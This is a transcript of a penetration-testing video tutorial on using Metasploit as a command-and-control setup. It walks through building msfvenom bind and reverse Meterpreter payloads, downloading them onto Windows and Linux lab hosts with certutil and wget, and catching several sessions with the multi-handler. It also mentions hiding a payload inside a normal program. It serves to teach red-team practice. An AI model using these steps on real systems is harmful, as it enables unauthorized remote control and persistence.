Hey everyone, welcome back to another Offensive Security C2 series video. In our last two videos, we've been going over some of the very basic fundamentals of what C2 is and basic tools to handle network communications for C2. However, the techniques we've discussed so far with tools like Netcat are very bare bones and don't even begin to scratch the surface of what C2 can be. In today's video, we're going to introduce the Metasploit Framework from the perspective of C2 communications. We will look at various payloads, protocols, multi-handler support, and traffic analysis to really understand the fundamentals of what it means to use the Metasploit framework for C2 operations. With that, I'll throw up the usual disclaimer and we'll dive right in. So I expect for most of my audience to at least know what the Metasploit framework is and likely have used it to exploit a host before. However, for those that may be a bit newer and are just now getting familiar with it, the Metasploit framework is just that. It's a framework. Specifically, it is a framework for conducting offensive security operations. It is a module to assist with reconnaissance, exploitation, exploit development, post-exploitation, data gathering, password attacks, command and control, and even recently some antivirus evasion. When most people use Metasploit, they are only making use of an extremely small subset of its features. In fact, professionally, I've only used Metasploit a handful of times, and most of those times it's just because there's just a reliable exploit module for me to use against a target to be able to compromise it, and provides a lot of simplicity. Many colleagues that I've talked to also use Metasploit in a similar manner. However, I also know of testers that live inside the Metasploit framework and use it to an impressive extent, not just to use one-off exploits here and there. What I want to emphasize here is that Metasploit does so much more than function as a tool to exploit vulnerabilities. It is truly a framework and toolkit for offensive security professionals. Today we aren't going to be learning the ins and outs of Metasploit. For that, I'll link Mubix's Metasploit Minute series and the free Offensive Security Metasploit course below in the description. Instead, we're going to be carving off a few sections of the Metasploit framework to use that are specifically geared towards C2 operations. We will explore each feature individually in this video and chain them together to build a powerful C2 setup. This will help us demonstrate how we can use the framework to control targets in a bulk operation after they've been compromised. We will not be going over any exploitation techniques or using the framework to do any hacking, so to speak. That's just not the purpose of the series. We will instead be approaching this from the perspective that we are on an engagement, and we'll be assuming that we have already compromised a few of our clients' hosts, and we are now in the post-exploitation phase of this engagement. This video will be more about gaining basic persistence in C2, and the next video we will actually be diving more into the post-exploitation modules, so that way we can see what benefits we get as an attacker by choosing to use the Metasploit framework as a C2. And I'll talk a little bit more about that later on in the video when we close out, but I wanted to throw that out there to kind of gear you up for what to expect for the next few videos in the series. The first two tools I want to introduce in this video, though, need to be brought in together as they will serve as the primary means of C2 communication within the Metasploit framework. The first tool is known as MSF Venom. Let me bring up the help page for MSF Venom real quick. So for that, we'll type MSF Venom -H. And here we get a whole list of options for MSF Venom. And if we scroll up a little bit, we'll see that MSF Venom is a standalone payload generator, and it replaces MSF Payload and MSF Encode. And I'll talk a little bit about that momentarily. So just like the little help dialog said, MSF Venom is a payload generation tool. Like all the tools in the Metasploit framework, it serves many purposes. However, its most basic purpose is to essentially generate payloads that can be used to call home to the multi-handler. More on that in a moment. In fact, just like we saw in the help, MSF Venom used to be called MSF Payload, and it would actually be paired with another tool known as MSF Encode to encode various payloads for numerous applications. Both of these tools were ultimately combined into MSF Venom because they kind of go hand in hand. MSF Venom gives us the ability to generate many kinds of executable programs, scripts, web app scripts, and even mobile application scripts. And these can all be used to call back to a C2 with a simple shell, like we've seen with Netcat, or they can be bundled with an interpreter payload to let us integrate more closely with the Metasploit framework once we've executed the payload on a target. So just to kind of show you the amount of payloads that are on here, I'm going to list them. So we can actually list all payloads by typing MSF Venom, tac L for list, and actually not tac, it'll be tac L for list, and then payloads is the thing that we want to list. And this will actually take a minute to load because there are tons and tons of payloads, and honestly, Ruby's just a little bit slow. But we're not even going to be able to see the output because it's just going to barf a whole bunch of payloads out on the screen. And just like that, we've got tons and tons of payloads. And just kind of scrolling through here, we see a whole lot of Windows payloads, stuff about DLL injection, some stuff for specific execution and VNC programs. And these are all just different windows. We see stuff from interpreter. And now we get into some other stuff. So we see some stuff written in R, some Ruby shells, Python, PHP. We got some OS X stuff. Node.js, Linux. There's just tons and tons of payloads that we can generate with MSF Venom. So aside from just generating payloads, MSF Venom does many more things. It has support for encoding. You can export raw shell code with it. You can specify variable names and script types for that raw shell code. You can even make it blend in with a simple program, say calc.exe, and use this kind of like a template, and when your target executes your version of calc.exe, it'll actually just run calc.exe and then silently execute your C2 payload in the background. There are many ways to do tricks like that, but MSF Venom makes it super easy, which is why I had a word of caution about trusting random binaries in the last episode. So if you want to check out some of the shellcode functionality, in some of my older OSCP Journey videos, I actually use MSF Venom a lot as a quick tool to assist with custom binary exploitation whenever I'm trying to achieve some kind of code execution doing like a buffer overflow or something. So I may link a few of those in the description for easy access, but that's how you can see some of the utility behind MSF Venom aside from what we're going to use it for today. So in this video, I'm just going to show some basic payload generation to call home to our C2 server, which brings me back around to the multi-handler. Before we can talk about the multi-handler, we first need to go over MSF console very briefly. Let me pull up MSF console real quick. Okay, so now that we've got MSF console loaded up, let's talk a little bit about it. MSF console is basically the main tool used to interact with the Metasploit framework. MSF console is going to be how you execute modules, plugins, and all the other feature functionality in Metasploit. You can use it to gather data, exploit vulnerabilities, and in our case, we're going to use it to catch shells for C2. So back to the multi-handler once more. The multi-handler is just another Metasploit module. This one is built specifically for handling remote connections that call back to an instance of MSF console. It can receive and manage multiples of them, hence the name multi-handler. Now I'm not exactly sure just how many sessions the multi-handler can support, but I know it is partially dependent on system resources, and it can be a lot if you have a lot of system power. A fun project to consider might be running a stress test to see how many stable shells you can receive before everything just stops working. However, I do know Metasploit can handle more than enough shells for the average professional pen testing engagement. I've heard tells of well over 100 sessions opened and going strong, so the multi-handler tends to live up to its name. Alright, so we've talked about these pieces of the Metasploit framework. Let's demonstrate how we can use them together to create some powerful C2 communications. So in this video, I'm going to demonstrate 3 sets of concepts to consider when establishing C2 communications using the multi-handler and MSF Venom. All 3 of these can be interchanged and combined to execute the particular payload and communication format that you want to achieve. First, I'm going to discuss the concept of a bind payload in the context of MSF Venom. If you have watched the first video in the series, you'll know that we went over the differences between bind and reverse connections already. Well, with Metasploit, you can choose to connect to a target with a bind or reverse connection. I even demonstrated this concept in that same video. But now I'm going to break things down in the context of MSF Venom. Now, originally we used netcat to listen on our client so that we could bind to it. With MSF Venom, we can actually generate a payload that will open a port on the client for us to bind to. This payload is simply an executable that will run on the target and service up a shell on the port that we tell it to listen on. For this example, I'll use the Windows Meterpreter bind TCP payload. So let's break down our first universal truth about MSF Venom and payloads. So for starters, these payloads are the exact same payloads you will use inside of Metasploit. If you've ever ran an exploit module and had to specify a payload, these are those same payloads. I'll demonstrate this in a moment when we swap over to the multi-handler, because that's how we'll kind of set our payloads there. It's similar to setting in an exploit module, and you'll actually use the exact same syntax. So that'll help us kind of visualize that. So payloads follow the following format. We have the target OS, the architecture, which can actually be optional depending on what the payload is, the shell type, which this is usually Meterpreter or basic shell, or I mean it's shell, it's not actually basic shell, but you get the idea. Those are usually the only two, is either you're doing a standard shell or a Meterpreter payload. And then the connection type, and this can be anything from TCP, UDP, HTTPS, whatever's supported by a particular payload. So that's typically the layout of all of our payloads. Now this breaks down one step further into staged versus stageless payloads, but we'll talk about that a little bit later in this video. So when I specify my bind shell, I'm going to choose my target OS as Windows. And I want a 32-bit executable, so I'm not going to have to specify the architecture. So let's do that. I'll run MSF Venom, TAC-P for payload, and I want a Windows, and I don't need to specify the architecture because I want a 32-bit payload. Now this isn't always true. I believe for Linux payloads you do actually have to specify x86, so make sure you list your payloads and see what the actual options are for the payloads you want to generate. In my case though, I know that a 32-bit Windows payload doesn't require an architecture argument. And so my next step is to specify the shell type, which is going to be Meterpreter. And then finally, I want the connection type, which for us, we're going to specify bind TCP. All right, and so now we need to specify one more argument, and that is going to be LPort. And in our case, we'll make it 9001. And we'll specify the format as executable, which is just TAC-F-exe. And the output as, we'll call it bob.exe. Shout out to Mubix and Metasploit Minute. So we'll run this, and this will generate us a nice bob.exe that is going to be a bind TCP payload listening on port 9001 on our host. So it generated the bob.exe. If we do a file on bob.exe, it is a PE32 executable for Windows. Our next goal is to get this on the target. For the sake of this video, we're just assuming we have access to this target and are able to drop the payload exe right on the target. So I'm going to do that real quick. I actually do have a target here for a Windows shell, and I'm getting all funky with my terminal windows, so give me just a moment here. That was funny. Alright, so first I need a way to serve up my executable. So I'm going to start a simple HTTP server like I always do and listen on port 80. And then over here I'm actually going to use the certutil. This is a great way to get downloads, kind of like a wget or a curl call onto Windows systems. So we're going to say URL cache split TAC-F, and now we can specify our web server. So I know this is my C2 server's IP, and we want bob.exe. And this specific shell that I have going on here is actually a weird one where I have to use some absolute paths, so that's no problem. We'll just drop bob.exe into C:\\. And looks like we successfully got a hit, and it was downloaded successfully. So since I executed this, nothing really appears to happen. But if we did this right, what's actually going on is a Meterpreter session to spawn, and it's waiting for a connection on the port I specified. Now if I open up my multi-handler, so let's do that. Use exploit multi-handler. And like I mentioned in the very first video, this is an exploit module, but it's not really exploiting anything. It's just part of exploitation, and it kind of just fits best in here. It's not really an auxiliary module either. So we're going to show our options. And now I need to specify my payload the same way I did with MSF Venom. So this is the kind of chunk I was talking about where payloads in MSF Venom are the same as everywhere else in the Metasploit framework. So specify payload, and that's going to be Windows, Meterpreter, bind TCP. Then we need to set the target's R port to connect to, and that is going to be 9001. Now when I run exploit, actually forgot one more option. So our port was important, but also our host, which in our case is going to be this 102 host. Now when I run exploit, well, let's show options real quick before we go off exploiting the host, since we've already made one mistake. It looks like L port wasn't set, and this is a listening port. So I wonder if we need to specify L port. We need to follow our instructions here on 9001 and see if this works out. Yeah, so that would actually be right, because if you remember over here, actually we can see it behind our terminal. When we specified the port, it was actually the L port, and that makes good sense. So we need to make sure we're following the proper conventions for our multi-handler here. Now when we run exploit, instead of getting a nasty error because we didn't specify our options correctly, we should get a successful shell back. And bam, just like that, interpreter session 1 open. So that means everything worked correctly with our bind shell. Now for reverse shell, we actually do exactly the same thing, but modify our connection type in our payload to be reverse TCP instead. And then we'll specify the parameters it needs to connect back to our C2 server. So let's background this session, move over this window, and come back to MSF Venom to generate our new payload. So we can actually specify that with -p again, Windows, interpreter, and again this is 32-bit payload, so we don't need to specify the architecture for these particular Windows payloads. So we will go to interpreter, and then we need to specify reverse TCP instead of bind TCP. And here's where things get a little bit different. We need to actually specify the L host, which is going to be us. This is actually our C2 server. And then the L port that we are listening on, which is going to be, we'll do 9002. Format is executable, taco, and this one won't be bob.exe. Instead, we'll just call this thing.exe. So this is our thing.exe. And this may be a little bit confusing to you because you'll see L port and you may think L port was what we specified on the bind payload, right? So L port is going to be listening on the target, right? Well, no, not in this case. In this case, we know this is a reverse shell payload. So it is able to infer that L host and L port are going to be the listening host and listening port of our C2 instance that is going to catch the shell. It's able to parse those parameters because we specified reverse in our payload rather than bind. So L port in a bind payload is what port is listening on the target. L port in a reverse payload is going to be our C2's port. So we will run MSF Venom to get our payload running. Or to get our payload generated, I mean. And then there we go, we have thing.exe specified. Now if we go back to our multi-handler, we will now specify our payload to be that same exact payload we just set in MSF Venom. So Windows interpreter reverse TCP. And now if we look at our options, it's a little bit different. We have those L port and L host options. So we'll set L host to be our C2 server, which we know is this 2.187 address, and our L port we know is going to be 9002, so we need to make sure we update that. Now what I'm going to actually do is interact with that interpreter session again. So we can go check out our sessions and interact with session 1. And what's cool, if I execute, if I background this one more time actually, and I execute ls, we'll see that I am operating out of my home directory as the working directory, and we can see thing.exe and bob.exe in there. And so if I go to sessions tac I1, I can actually use this interpreter shell to upload my thing.exe payload. And I want to look at what directory I'm in actually. I'm in system32, so I want to cd into c:\/ just to make this a little bit easier. I messed that up, cd c:\/ so that way I can use my other shell over here. Even though I don't really need to, I feel like it's just going to be easier in terms of setting things up. So we should now be in that directory. We are. Now we'll upload our test our thing.exe, and it's going to know that where to pull this from because it's going to check our current working directory, which is the home directory, which thing.exe should be stored in. We'll talk a lot more about the feature functionalities of interpreter and post-exploitation modules in the next video, but I just want to do this as a quick and dirty way to get our reverse shell payload over there. So there we go, thing.exe is uploaded and ready to go. We can list that real quick just to show that it is indeed in there, and then we'll background that shell. And now we can look at our options again to make sure we have everything set up correctly. So it looks like we do, and we can simply run exploit, and this will start our reverse shell handler and listen on port 9002 for our reverse shell payload. Come back over here to our compromised host, our initial shell, and we should be able to run thing.exe right out of c:\/ and I typoed that. So let's try that again. There we go. Interpreter session 2 open. Beautiful. So we're actually dropped into that session. We can background it and list our open sessions. Look at that. We've got two 32-bit interpreter sessions open on this particular system, and one's a reverse shell, one's a bind shell. So that's really cool. We're handling two pretty powerful and stable shells on our particular host. And the next thing I want to talk about here is stage versus stageless payloads. Now, I won't dive too deep here, as the differences between staged and stageless payloads are a better topic for an exploit development video rather than a C2 video. But the gist is this. A staged payload consists of a small bit of code that simply calls back to our C2 and requests the rest of the actual shellcode. The initial code only has enough logic to send the request and execute what it receives. It's broken down into stage 1, which is executing the initial code to call home, and stage 2, which is downloading and executing the code it receives after it calls home, which in our case is a remote shell. And we've actually been using staged payloads this entire time. So our payloads have actually been smaller, and they've been executing in those stages. We can actually see here, we start our handler. When we receive a connection, the first thing we do is send another stage. Once that stage is sent successfully, then we get our shell open. So we can actually see that happening in real time with the multi-handler. The stageless payload, however, is the exact opposite. And this just means that it's the whole package. It's shellcode and everything all in one binary. Now, I bring this up because in Metasploit, there's a particular nuance in specifying whether we want a staged or stageless payload. And it's in the structure when we define a payload with MSF Venom. This nuance is based on whether we separate the shell type with a slash or an underscore when defining our payload. A slash means we're defining a staged payload, and an underscore means we are defining a stageless payload. Let me demonstrate what I mean by that. So going back to our example, we say our target OS, architecture, which could be optional, and then we have our shell type and our connection type. If the layout of your payload argument looks like this, you are actually specifying a staged payload. That's what the slash between the shell type and the connection type mean. However, if you specify an underscore between the shell type and connection type, this will generate a stageless payload, which will be the full all-in-one package. Now, I don't know for sure, but there may be some payloads that don't have options for staged payloads or don't have options for stageless payloads. You'll have to go through each payload type and see kind of case by case what that scenario is. However, that is the kind of nuance when it comes to specifying staged versus stageless with MSF Venom or the Metasploit framework. That is literally it. It's very, very subtle, and it's something that's very important to know. However, this really only truly matters in the context of exploit development, but I feel it's important to point out, as there could be good scenarios outside of exploit dev where this knowledge is useful. For instance, maybe there's a vulnerable file upload, and it's restricted by size. So using a smaller staged payload may help you get around that restriction versus a larger stageless payload. Alright, so now that we've covered all of those nuances, the last thing I want to define when it comes to payloads is around that connection type option. There are many ways to connect back to your Metasploit C2, and honestly there's no wrong way to do it, but just as a general best practice, 90% of the time you're going to want to use a reverse HTTPS connection. These are encrypted, they look like web traffic, and they're usually allowed out by firewalls. That said, there's always an exception to this rule, and that's why I say there's no wrong connection type. HTTPS just happens to be consistent, but be sure you pay attention to your environment before deciding on the best method to call home. Many payloads support anything from TCP to HTTPS and even UDP. Play around with these connection types and explore their differences. Alright, so now that we've been over all of the nuances to the payload argument, let's generate a few payloads with some of the variations of those options for both a Windows and Linux target. So we'll do we'll start off with MSF Venom, tag P, we'll specify Windows, interpreter, and we'll do reverse HTTPS. And we'll specify our C2 server again, and port 9003 is going to be the argument. This will be an exe, and the output will be let's call it awesome.exe. That's going to be our payload. So we'll generate our awesome.exe. That is a interpreter reverse HTTPS payload. And then once that's generated, we will now generate a similar payload. Let me go look at the shell we have here to make sure I get the right architecture. So I've already compromised this host. It is a 64-bit host, so we'll need to specify a 64-bit Linux payload. So we'll specify the TAC-P, Linux, x64, interpreter, and we'll say we want reverse TCP. And just like before, we'll specify our L host, 187, and we'll specify the L port as 9004. Hopefully we can keep up with all these. And for this, we'll actually want the format to be ELF. We want this to be a Linux formatted binary, which is the ELF executable format. So we will name this cool.exe. So we have our awesome.exe and our cool.exe. And we're actually going to generate one more binary with for our Linux host, since we already have a couple shells on the Windows host. So the next one we're going to generate is also a reverse connection, but it'll be that reverse HTTPS connection for Linux. And everything else can actually stay the same, except for our L port will change to 9005. And we'll say supercool.exe, and we'll generate that payload. Okay, so we actually just ran into a weird error that I wasn't expecting in this video for the reverse HTTPS payload on Linux. So let's check out our payloads list. So we'll say TAC-L payloads, and we'll grep for Linux. And this will hopefully filter out a more readable Linux format payload, so we can at least see what's going on here to see why that was an invalid payload. Maybe I just had a typo, or maybe it's actually just not a supported payload type for a 64-bit Linux payload. Alright, so we scroll down a little bit here and we run into our x64 interpreter Linux payload. So we can see that there's a staged reverse TCP payload here for Linux x64 interpreter, and there is a stageless one for reverse HTTP and reverse HTTPS. We also have a stageless one for reverse TCP, but it doesn't look like the x64 architecture supports a staged payload for Linux x64. We can see if maybe there is a 32-bit version of the module that supports HTTPS in a staged format. It actually doesn't look like Linux supports that. So here's a scenario where we're actually forced to generate a staged payload if we want to use reverse HTTPS on Linux using MSF Venom. And I'm curious as to why that is. Maybe you should go research that and see why Linux only supports a staged, a stageless payload for 64-bit and 32-bit Linux on the HTTPS payload, because I actually don't know. There may be a technical limitation that I'm not aware of. But regardless, we've got our setup. We'll still be able to generate our file correctly for our payload, and everything will be hunky-dory. Alright, we have our supercool.exe generated, and just to kind of clean stuff up and keep things organized, I named our Linux files with .exe. It's not really going to matter too much, but just as a formality, they're not technically exes, they are executable files, so again, this is just a formality. So I'm going to clean them up and remove the exe file extension, and we are good to go. So now we have everything all nice and organized. Alright, cool. So now we're starting back on our host again. I actually had some technical difficulties in that cut there, so we lost some shells. No problem though, we got our shell back using our thing.exe payload. And now we're going to set up that awesome.exe payload. So we will go into our session here and interact with session 4. And then we should actually be able to cd into c:/ again. Oops, messed up. cd c:/ interpreter doesn't like the actual backslash on the Windows syntax. That's not a problem. So now we'll upload our awesome.exe. Awesome.exe has been uploaded, so we'll background that. Okay, so now that we're all set up and we've generated a few payloads with MSF Venom, let's start getting some more shells. I'm also going to be showing how we can use use the payloads module to get around needing MSF Venom and setting up our payloads inside of MSF console, so we can actually work out of a single tool. Now, I personally prefer MSF Venom as I use it a lot in exploit dev scenarios, and I have the syntax fairly memorized, but I can't deny the convenience and power of handling all of this functionality within Metasploit from a C2 perspective. So to use a payload in the payload module, we simply type use payload, and in our case, we will generate some of the same payloads. So we won't actually need to use these, but just kind of for the sake of showing it, I am going to generate the Windows payload that we did before. So we can say use payload Windows interpreter, and we'll say reverse HTTPS. Alright, so here we can actually say show options, and here are all the same options that we could provide as arguments to MSF Venom: the lhost, the rport, the luri, anything like that to actually serve up. So in this case, we really only need the lhost and the lport unless we want to do further customization. So we can just say set lhost. That got all funky with autocomplete. And then we can say set lport, and we'll just set this delete. We won't actually use this payload, but then we can say generate. So that generates our shellcode for us, which isn't exactly what we want. We actually want a executable format. So we can actually say generate, if I can spell, TAC-H to get some option commands. So generate TAC-H, this is where we can actually specify the format as exe and specify the output name, and we'll call this payload.exe. And then that'll generate it just like we did with MSF Venom, and we did it all within the MSF console setting, which is really, really powerful. We won't have to leave MSF console to do all of our C2 operations. So, like I said, we've already got our payloads generated, and we've even got one uploaded, so we don't really need to do anything at this point in terms of executing shells and whatnot. So let's go back to the multi-handler. So over here you can see that I actually have two targets on my network. You probably noticed the whole time throughout this video. And I've got initial shells on both of these systems. We've been playing around on the Linux one a little bit already, or I mean on the Windows one a little bit already, and we have the Linux one to play around with as well. So I've already exploited these systems and gained some initial shells, and even on the Windows one established a little bit of persistence, but I want to sink my teeth in with a little bit more persistence and gain some feature functionality from Metasploit's interpreter payload on both of these hosts. And I'm going to do that by uploading my payloads and then calling home to my multi-handler. So we've already talked about and used the multi-handler quite a bit. I'm going to introduce one more new option as we go, but basically we want to start the same shell handler jobs and then go sit and listen for our shells. And so we've got two different kinds of payloads on two different OSs running, and we want to do this efficiently and effectively. So we'll start off by setting up our first one, and to do that we'll look at our options, and we're actually still set up to use the reverse TCP payload. So the first thing we want to do is set the payload to Windows to autocomplete, so it's taking a second. Interpreter reverse HTTPS. And then I believe our L port, if we go here and look at our payload generations, was 9003, and we should note an increment based on that. So we'll say set L port to 9003. And the next thing we'll want to do is actually play around with our new value that I was alluding to. So we've got the base option set, and there's one more option that we need to configure, and that isn't really listed here. I believe if you go show advanced, if I can spell, there are tons and tons of additional options you can set for your multi-handler. And the one we're going to look at in particular is called exit on session. And if I can find that here and point it out, I will. But it doesn't look like I can. It may not be in the advanced, it may be somewhere else. But basically, we want to set this exit on session to false. And what this does is determines if our handler is supposed to exit and stop listening once it receives a shell or not. And we actually don't want it to stop. We want it to keep running in case we need more shells with the specific payload that we have set. So we're going to set this to false so we can keep on catching shells and it won't ever die. And now we just run exploit TAC-J, which if you remember from our first video, just runs this as a background job. So we've got a reverse shell handler listening on port 9003 for an HTTPS connection. And we can start off, we can execute, I believe it is awesome.exe if we've actually uploaded that. So I don't know that we have. So let's see, oh, we did. Okay, so we did. So we can actually execute awesome.exe, and we should get a shell that calls back home. All right, so I'm going to do a quick cut here. I actually had some really funky issues with the HTTPS payload on this older demo box. So hopefully we can still get the point across with our Linux system here, and it won't be a huge deal. So actually I need to log back in. Awesome. So we'll leave the Windows host alone since it's given us some problems, but we can still demonstrate everything else that we wanted to with the Linux host, and hopefully we'll have less issues. So we'll start off by setting the payload to Linux x64 interpreter reverse TCP, and we can actually take a look at our options again. Our L port should be 9004 for this one, and set exit on session to false. It should still be set to that, but just in case. And so we'll run exploit.sh to run that in the background, and then we'll also go ahead and set up our other payload just to be super efficient. So we'll say Linux x64, and we'll say interpreter, and remember we need to use the underscore syntax for our stage list payload. So interpreter reverse HTTPS, set the L port to 9005, and exploit.sh. So now we actually have, if we do jobs, we can see we have several jobs running. So we have those two failed Windows jobs that were running before. We actually just killed them, so we'll kill 0 and kill 1. Just so they don't cause us any trouble. So now we have two reverse handlers that are running for our Linux target. And if I go and I start up another Python simple HTTP server on port 80, and then I come over to my Dre host that I have here, I can say wget 192.168.2.187. And we'll do that for, we had cool, and we'll download that. And we should be able to say super cool as well. And let's check those permissions to make sure we can actually execute them. We can't, so let's chmod those to cool, super cool. Alright, so now they're executable, and we have our listener ready to go. Let's go ahead and shut down our simple HTTP server. And now we should just be able to execute these and get a shell. So I will execute /cool as a background job. And just like that, we've got interpreter session 5 open. And then we'll do the same thing with super cool. And we got interpreter session 6 open. And we actually see that that was the HTTPS shell. That's why we have all of this HTTPS-like data. So if we look at our sessions, we've got 2 sessions open, and I'm actually just going to open 2 more shells doing the exact same thing we just did, because 1 is none and 2 is 1, and also because I want to demonstrate that whole exit on session false thing to show that these are still running. So we can actually look at that with the jobs command, show that those handlers are both still running, and then execute cool and execute super cool. And now we can actually just go interact with those sessions. So we can say sessions tech I 5, ls, get UID. We have a nice interpreter payload going on here. We can do the same thing with session 6. Looks like it's being a little bit more finicky, but still works. Cool. A little bit slow, no problem though. And we'll just go quickly visit 7 and 8 to round everything out. Cool, so we are now handling, it says we have 8. We actually just have 5 shells here just from all the failed sessions that have died over the course of recording. But we are handling 5 sessions across 2 different systems perfectly fine. We've established some persistence. We've shown how we can set up the multi-handlers and stuff like that. So that's really awesome. Alright, cool. So like I just said, we've caught some shells, established some C2 with Metasploit, and I know this was a bit of a longer video, but we aren't quite done with Metasploit just yet. In our next video, we will talk about some of the post-exploitation features that we can take advantage of that make Metasploit an appealing option for C2, even if you don't use it for initial exploitation during offensive security operations. Now, we won't be covering all of Metasploit, of course. That would be far too much and outside of the scope of this series. However, as we compare C2 tooling, there are different features that are built in, and these varying capabilities just mean that there's a different use case for any given tool, and it's up to you to decide what to use. So hopefully, I'm able to cover a few of these tools that I enjoy using well enough that they provide valuable information about what's out there and what feature functionality can be gained by using a specific utility for C2 communications. So that's it for this video. I hope you enjoyed it. Please leave a like if you did, and subscribe so you don't miss the next video. Thanks!